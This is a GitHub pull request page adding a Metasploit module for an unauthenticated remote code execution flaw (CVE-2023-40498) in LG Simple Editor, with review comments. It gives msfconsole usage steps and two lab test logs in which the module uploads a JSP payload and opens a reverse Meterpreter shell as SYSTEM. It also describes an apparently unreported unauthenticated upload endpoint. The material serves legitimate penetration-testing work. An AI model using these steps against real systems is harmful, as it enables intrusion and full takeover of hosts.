Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add LG Simple Editor Unauthenticated RCE (CVE-2023-40498) Exploit #18329

Merged
merged 7 commits into from
Sep 7, 2023
Merged

Add LG Simple Editor Unauthenticated RCE (CVE-2023-40498) Exploit #18329

merged 7 commits into from
Sep 7, 2023

Conversation

EgeBalci
Copy link
Contributor

Hello 👋

This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on the LG Simple Editor versions <= v3.21. Module achieves code execution via uploading and executing a JSP payload.

Testing

For installing the vulnerable version follow the steps below,

  1. Download the installation file of the vulnerable software here
  2. Follow the installation steps.

After these steps, the LG Simple Editor service should be accessible on port 8080.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/http/lg_simple_editor_rce
  • Do set rhost [IP]
  • Do check

@jheysel-r7 jheysel-r7 self-assigned this Sep 5, 2023
jheysel-r7
jheysel-r7 reviewed Sep 5, 2023
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the module @EgeBalci, looks great, testing was as expected.

Just a couple last minute comments about the metadata.

msf6 > use lg_simple
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/windows/http/lg_simple_editor_rce  2023-08-24       excellent  Yes    LG Simple Editor Remote Code Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/lg_simple_editor_rce

[*] Using exploit/windows/http/lg_simple_editor_rce
msf6 exploit(windows/http/lg_simple_editor_rce) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(windows/http/lg_simple_editor_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/http/lg_simple_editor_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 3.21.0
[*] Uploading JSP payload...
[+] Payload uploaded successfully
[+] /XasNt_original.bmp -> /XasNt.jsp copy successfull.
[*] Triggering payload...
[*] Sending stage (175686 bytes) to 172.16.199.131
[+] Deleted ./webapps/simpleeditor/XasNt.jsp
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:51845) at 2023-09-05 18:05:07 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-8ATHH6O
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

modules/exploits/windows/http/lg_simple_editor_rce.rb Outdated
'Description' => %q{
This Metasploit module exploits broken access control and directory traversal
vulnerabilities in LG Simple Editor software for gaining code execution.
The vulnerabilities exists in versions of LG Simple Editor prior to v3.21.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I saw the ZDI advisory/ the references listed below only mention one CVE but here you're mentioning the module exploits multiple vulnerabilities. Should there be another CVE listed in the references? Just curious.

Suggested change
The vulnerabilities exists in versions of LG Simple Editor prior to v3.21.
The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes, module exploit two vulns, but directory traversal is the only one reported to ZDI. The second vuln is broken access control because the uploadImage.do endpoint does not require authentication. I discovered the second vulnerability while trying to exploit the first one. I couldn't find any CVE or related publication; It might be a 0day.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Cool, after a quick search I couldn't find anything related to the second vuln either. There were 25 CVEs disclosed in the security bulletin and ZDI specified that the path traversal is exploitable without authentication. I say we land this as is for now, however when more info comes out if this does turn out to be an 0day we can help get you a CVE assigned.

modules/exploits/windows/http/lg_simple_editor_rce.rb Outdated Show resolved Hide resolved
@jheysel-r7
Copy link
Contributor

Thanks @EgeBalci, great module, testing was as expected:

msf6 exploit(windows/http/lg_simple_editor_rce) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(windows/http/lg_simple_editor_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/http/lg_simple_editor_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 3.21.0
[*] Uploading JSP payload...
[+] Payload uploaded successfully
[+] /thWIS_original.bmp -> /thWIS.jsp copy successfull.
[*] Triggering payload...
[*] Sending stage (175686 bytes) to 172.16.199.131
[+] Deleted ./webapps/simpleeditor/thWIS.jsp
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:62426) at 2023-09-07 16:14:40 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-8ATHH6O
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

@jheysel-r7 jheysel-r7 merged commit ef4a9dd into rapid7:master Sep 7, 2023
32 checks passed
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 7, 2023
@jheysel-r7
Copy link
Contributor

Release Notes

This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on the LG Simple Editor versions <= v3.21. Module achieves code execution in the context of NT AUTHORITY\SYSTEM via uploading and executing a JSP payload.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jheysel-r7 jheysel-r7 jheysel-r7 left review comments

@cdelafuente-r7 cdelafuente-r7 Awaiting requested review from cdelafuente-r7

Assignees

@jheysel-r7 jheysel-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@EgeBalci @jheysel-r7 @cdelafuente-r7